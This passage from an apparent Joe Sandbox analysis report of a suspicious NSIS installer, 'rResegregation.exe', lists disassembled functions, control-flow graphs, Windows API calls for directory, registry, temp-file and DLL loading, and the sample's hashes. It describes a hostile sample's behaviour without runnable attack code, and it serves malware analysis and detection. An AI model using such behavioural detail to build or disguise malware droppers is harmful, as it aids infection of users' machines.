                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre,00000000,00000000,00000031), ref: 004017BA
                                                                    • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Bortdmmer Setup,NSIS Error), ref: 00405D19
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                    • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0), ref: 00404F81
                                                                    • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll), ref: 00404F93
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre$C:\Users\user\AppData\Local\Temp\nsoF4B.tmp$C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll$Call
                                                                  • API String ID: 1941528284-3702322575
                                                                  • Opcode ID: 9b300b49a9657bfd428a479fc8852c58b384813346898322a4567d762304faaf
                                                                  • Instruction ID: e334bcbcf7859558867c6a38b10ffbeddee8f855bc543c6a7f27992f07fd6e89
                                                                  • Opcode Fuzzy Hash: 9b300b49a9657bfd428a479fc8852c58b384813346898322a4567d762304faaf
                                                                  • Instruction Fuzzy Hash: 4B41C672900519BADB107BA5CC45DAF7AB9DF46329B20C33BF021B20E1C67C4A419A5D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404F25 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 621 404f25-404f3a 622 404ff0-404ff4 621->622 623 404f40-404f52 621->623 624 404f54-404f58 call 405d2e 623->624 625 404f5d-404f69 lstrlenA 623->625 624->625 627 404f86-404f8a 625->627 628 404f6b-404f7b lstrlenA 625->628 630 404f99-404f9d 627->630 631 404f8c-404f93 SetWindowTextA 627->631 628->622 629 404f7d-404f81 lstrcatA 628->629 629->627 632 404fe3-404fe5 630->632 633 404f9f-404fe1 SendMessageA * 3 630->633 631->630 632->622 634 404fe7-404fea 632->634 633->632 634->622
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                  • lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0), ref: 00404F81
                                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll), ref: 00404F93
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll
                                                                  • API String ID: 2531174081-1640484927
                                                                  • Opcode ID: ffeeb4340939991043f1e35409b025ff27b4b0c44884115af8641db84ff7770b
                                                                  • Instruction ID: b1dc6bec94ba42b715134808c0c3c35089c42976f802e7ea77bea70e7b84fba8
                                                                  • Opcode Fuzzy Hash: ffeeb4340939991043f1e35409b025ff27b4b0c44884115af8641db84ff7770b
                                                                  • Instruction Fuzzy Hash: 1F21817190011DBFDF119FA5DD449DEBFA9EF45354F04807AFA04A6291C7388E409BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004053EB Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 635 4053eb-405436 CreateDirectoryA 636 405438-40543a 635->636 637 40543c-405449 GetLastError 635->637 638 405463-405465 636->638 637->638 639 40544b-40545f SetFileSecurityA 637->639 639->636 640 405461 GetLastError 639->640 640->638
                                                                  APIs
                                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040542E
                                                                  • GetLastError.KERNEL32 ref: 00405442
                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405457
                                                                  • GetLastError.KERNEL32 ref: 00405461
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                  • API String ID: 3449924974-2230009264
                                                                  • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                  • Instruction ID: 8acfd36fb30660db29d177a8be8d7647adb8d58efdd4f3c758bfd1505ce0b010
                                                                  • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                  • Instruction Fuzzy Hash: CF010871D14259EADF119FA4D9447EFBFB8EF04315F004176E904B6290D378A644CFAA
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406037 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 641 406037-406057 GetSystemDirectoryA 642 406059 641->642 643 40605b-40605d 641->643 642->643 644 40606d-40606f 643->644 645 40605f-406067 643->645 647 406070-4060a2 wsprintfA LoadLibraryExA 644->647 645->644 646 406069-40606b 645->646 646->647
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
                                                                  • wsprintfA.USER32 ref: 00406087
                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                  • API String ID: 2200240437-4240819195
                                                                  • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                  • Instruction ID: 17439860729f5247506b6fa79cc71e4dc0dc9fec6db89644704a68070b9bc3a3
                                                                  • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                  • Instruction Fuzzy Hash: BAF0F630A40209ABEB14EB78DC0DFEB365CAB08305F14017AB547F11D2EA78E8258B69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402E9F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 648 402e9f-402eb3 649 402eb5 648->649 650 402ebc-402ec5 648->650 649->650 651 402ec7 650->651 652 402ece-402ed3 650->652 651->652 653 402ee3-402ef0 call 40308e 652->653 654 402ed5-402ede call 4030a4 652->654 658 402ef6-402efa 653->658 659 40307c 653->659 654->653 660 402f00-402f26 GetTickCount 658->660 661 403027-403029 658->661 662 40307e-40307f 659->662 665 403084 660->665 666 402f2c-402f34 660->666 663 403069-40306c 661->663 664 40302b-40302e 661->664 667 403087-40308b 662->667 668 403071-40307a call 40308e 663->668 669 40306e 663->669 664->665 670 403030 664->670 665->667 671 402f36 666->671 672 402f39-402f47 call 40308e 666->672 668->659 681 403081 668->681 669->668 674 403033-403039 670->674 671->672 672->659 680 402f4d-402f56 672->680 677 40303b 674->677 678 40303d-40304b call 40308e 674->678 677->678 678->659 686 40304d-403059 call 405a26 678->686 683 402f5c-402f7c call 406188 680->683 681->665 690 402f82-402f95 GetTickCount 683->690 691 40301f-403021 683->691 692 403023-403025 686->692 693 40305b-403065 686->693 694 402f97-402f9f 690->694 695 402fda-402fdc 690->695 691->662 692->662 693->674 696 403067 693->696 697 402fa1-402fa5 694->697 698 402fa7-402fd2 MulDiv wsprintfA call 404f25 694->698 699 403013-403017 695->699 700 402fde-402fe2 695->700 696->665 697->695 697->698 706 402fd7 698->706 699->666 701 40301d 699->701 703 402fe4-402feb call 405a26 700->703 704 402ff9-403004 700->704 701->665 709 402ff0-402ff2 703->709 705 403007-40300b 704->705 705->683 708 403011 705->708 706->695 708->665 709->692 710 402ff4-402ff7 709->710 710->705
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$wsprintf
                                                                  • String ID: ... %d%%
                                                                  • API String ID: 551687249-2449383134
                                                                  • Opcode ID: 64d2ce798d2dc69bad610a2ea0e87ea1e6662520605f5bed10a59724df5d2c56
                                                                  • Instruction ID: 2f6adf6c827ed57ff932280c4bcb171559557b12de80228d6f8143075edc11b6
                                                                  • Opcode Fuzzy Hash: 64d2ce798d2dc69bad610a2ea0e87ea1e6662520605f5bed10a59724df5d2c56
                                                                  • Instruction Fuzzy Hash: 5D519E7280221AABDB10DF65DA44A9F7BB8AF00755F14417BFD10B32C4C7788E51DBAA
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 711 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 718 4023b0-4023b8 711->718 719 4028cf-4028de 711->719 721 4023c8-4023cb 718->721 722 4023ba-4023c7 call 402a3a lstrlenA 718->722 725 4023db-4023de 721->725 726 4023cd-4023da call 402a1d 721->726 722->721 727 4023e0-4023ea call 402e9f 725->727 728 4023ef-402403 RegSetValueExA 725->728 726->725 727->728 733 402405 728->733 734 402408-4024de RegCloseKey 728->734 733->734 734->719 736 4026a6-4026ad 734->736 736->719
                                                                  APIs
                                                                  • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023A2
                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoF4B.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023C2
                                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsoF4B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023FB
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoF4B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateValuelstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp
                                                                  • API String ID: 1356686001-4010544561
                                                                  • Opcode ID: b012daf43883be94562b48873df64982ee1afc678edabc89ed89c70fe9f2269d
                                                                  • Instruction ID: 90de9cbbb944b5ce7c16acb051fe3e73370ea29dc9d439d86f68b9f38bc34e97
                                                                  • Opcode Fuzzy Hash: b012daf43883be94562b48873df64982ee1afc678edabc89ed89c70fe9f2269d
                                                                  • Instruction Fuzzy Hash: 04117572E00108BFEB10AFA4EE89EAF767DEB54358F10403AF505B61D1D6B85D419B28
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004059AE Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 737 4059ae-4059b8 738 4059b9-4059e4 GetTickCount GetTempFileNameA 737->738 739 4059f3-4059f5 738->739 740 4059e6-4059e8 738->740 742 4059ed-4059f0 739->742 740->738 741 4059ea 740->741 741->742
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 004059C2
                                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059DC
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059B1
                                                                  • nsa, xrefs: 004059B9
                                                                  • "C:\Users\user\Desktop\rResegregation.exe", xrefs: 004059AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-3306602917
                                                                  • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                  • Instruction ID: 14833181556f01f8699e9ecebe408800633a5ab51cc0013a882439dab00eebba
                                                                  • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                  • Instruction Fuzzy Hash: 2AF0E232708204ABEB109F15EC04B9B7B9CDF91720F00C03BFA049A181D2B598448B58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 743 402a7a-402aa3 RegOpenKeyExA 744 402aa5-402ab0 743->744 745 402b0e-402b12 743->745 746 402acb-402adb RegEnumKeyA 744->746 747 402ab2-402ab5 746->747 748 402add-402aef RegCloseKey call 4060a5 746->748 749 402b02-402b05 RegCloseKey 747->749 750 402ab7-402ac9 call 402a7a 747->750 755 402af1-402b00 748->755 756 402b15-402b1b 748->756 752 402b0b-402b0d 749->752 750->746 750->748 752->745 755->745 756->752 758 402b1d-402b2b RegDeleteKeyA 756->758 758->752 760 402b2d 758->760 760->745
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402A9B
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
